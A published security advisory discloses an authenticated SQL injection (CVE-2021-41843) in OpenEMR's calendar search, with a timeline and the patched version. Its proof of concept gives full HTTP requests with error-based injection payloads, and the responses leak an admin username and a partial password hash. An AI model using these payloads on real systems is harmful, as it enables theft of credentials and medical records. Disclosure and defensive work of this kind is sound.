-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 # Trovent Security Advisory 2109-01 # ##################################### Authenticated SQL injection in OpenEMR calendar search ###################################################### Overview ######## Advisory ID: TRSA-2109-01 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2109-01 Affected product: OpenEMR web application Tested versions: 6.0.0, 6.1.0-dev Vendor: OpenEMR project, https://www.open-emr.org Credits: Trovent Security GmbH, Stefan Pietsch Detailed description #################### The OpenEMR web application is a medical practice management software and can be used to store electronic medical records. Trovent Security GmbH discovered an SQL injection vulnerability in the search function of the calendar module. The parameter 'provider_id' is injectable. The attacker needs a valid user account to access the calendar module of the web application. It is possible to read data from all tables of the database. Severity: Medium CVSS Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) CWE ID: CWE-89 CVE ID: CVE-2021-41843 Proof of concept ################ (1) HTTP request to read a username from the database table 'openemr.users_secure': ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1 Content-Length: 324 Host: 172.18.0.3 Content-Type: application/x-www-form-urlencoded Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q Connection: close pc_keywords=TRVNT&pc_keywords_andor=AND&pc_category=&start=09%2F16%2F2021&end=09%2F23%2F2021& provider_id=%28UPDATEXML%281%2CCONCAT%280x2e%2C0x20%2C%28SELECT%20MID%28%28IFNULL%28CAST%28username %20AS%20NCHAR%29%2C0x20%29%29%2C1%2C22%29%20FROM%20openemr.users_secure%20ORDER%20BY%20id%29%29%2C1%29%29&pc_facility=&submit=Submit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (2) HTTP response to (1): ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1 200 OK Date: Fri, 17 Sep 2021 07:26:48 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:13:28 GMT; Max-Age=28000; path=/; SameSite=Strict Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:13:29 GMT; Max-Age=28000; path=/; SameSite=Strict Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-XSS-Protection: 1; mode=block Content-Length: 27 Connection: close Content-Type: text/html; charset=utf-8 XPATH syntax error: 'admin' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (3) HTTP request to read a password hash from the database table 'openemr.users_secure': ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1 Content-Length: 324 Host: 172.18.0.3 Content-Type: application/x-www-form-urlencoded Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q Connection: close pc_keywords=TRVNT&pc_keywords_andor=AND&pc_category=&start=09%2F16%2F2021&end=09%2F23%2F2021& provider_id=%28UPDATEXML%281%2CCONCAT%280x2e%2C0x20%2C%28SELECT%20MID%28%28IFNULL%28CAST%28password %20AS%20NCHAR%29%2C0x20%29%29%2C1%2C22%29%20FROM%20openemr.users_secure%20ORDER%20BY%20id%29%29%2C1%29%29&pc_facility=&submit=Submit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (4) HTTP response to (3): ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1 200 OK Date: Fri, 17 Sep 2021 07:27:29 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:14:09 GMT; Max-Age=28000; path=/; SameSite=Strict Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:14:09 GMT; Max-Age=28000; path=/; SameSite=Strict Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-XSS-Protection: 1; mode=block Content-Length: 44 Connection: close Content-Type: text/html; charset=utf-8 XPATH syntax error: '$2y$10$ukudH2lRSW2vKX.' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### Limit access to the calendar search function until the vulnerability is fixed. Fixed in OpenEMR version 6.0.0 patch 3, verified by Trovent. History ####### 2021-09-16: Vulnerability found 2021-09-29: Advisory created & vendor contacted 2021-09-30: Vendor acknowledged vulnerability, CVE ID requested 2021-10-01: CVE ID received 2021-10-19: Vendor releases OpenEMR version 6.0.0 patch 3 2021-12-14: Add information about fixed version 2021-12-15: Advisory published -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE0wArIZvu5AKY9ZSXzx6v/h6FjrcFAmG523MACgkQzx6v/h6F jrfiNg//ag6gqoBqNNZXSeIeMPdpZ2l0m5nAJhLtpPKEzX8ZV2EOuZcku0xXmtVD ywkM7kb5E8U3PNmmgwSnAO6xVHDZJFXEy6TsVUKP1AWU1KSXMaI4VKKnWdehkRYY tY2GID6MfjfQVRYtYpST4rqvFVo+E2CGMJevjADrzaY+HrUqGMc0BbhYvluRhIbA /eP14hA8iiGzHg5z1H5RszLE9qkTA12pSci0HALk16hF7dYg8COyF3w3zzWQO3YC vIzy8ank1bPwzAOdCfMRn6gF1Pl4v+8fTei6/J34P7tMBKZcHojJgo9VgqueCjXr iyjW81juushnO1px3/1KqEiR5h6WDV2nWiWetAXCHPmXFH60otV9sRjmPiL06Zps 9aGmCtqF6DWFCx6tGIRKjwtCRzECKPZ/EesXYn8ZPJd//d9RgiV4ioOqNBwecLmO hQGywKjuBgbMCLa/iTB761dYne/NHjZmDlefcorygsNA6UaUa8fGduQD9PH95x0g YzAmTCxbdXGyaWk+nvds9U/4x116PQUlK3oaeiyB1ETgLT5cf3L6ILI5pBAMJmJd HY8gdMHUmVVdWa3K5lTPw5hlasGxZLzvaW1EEVK5RkrrWLeAS53GlmNyeLZLCyoT n9MAQgHibZn5IH+nAak1pnMywbsqHgJosWL0lFkc69V8ClON6lw= =f1+m -----END PGP SIGNATURE-----